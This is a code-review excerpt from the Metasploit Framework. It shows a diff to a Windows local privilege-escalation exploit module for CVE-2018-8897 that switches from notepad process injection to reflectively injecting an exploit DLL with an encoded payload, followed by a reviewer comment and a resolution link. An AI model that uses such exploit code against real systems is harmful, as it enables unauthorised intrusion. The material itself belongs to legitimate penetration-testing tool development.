modules/exploits/windows/local/mov_ss.rb

```diff
@@ -182,9 +149,12 @@ def exploit_dll
       print_status('Checking target...')
       validate_active_host
       validate_target
-      print_status('Target Looks Good... trying to start notepad')
-      process = setup_process
-      inject_magic(process)
+      print_status('Target looks good... reflectively injecting exploit DLL and triggering exploit!')
+      encoded_payload = payload.encoded
+      execute_dll(
+        ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-8897', 'reflective_dll.x64.dll'),
+        [encoded_payload.length].pack('I<') + encoded_payload
```

Comment:
This one does not look like the payload needs to have the size prefixed to it.

Reply:
Resolved with https://github.com/rapid7/metasploit-framework/pull/15384/commits/4ab1b6ca11cc7b025da6094ec4552eaaa8ad657b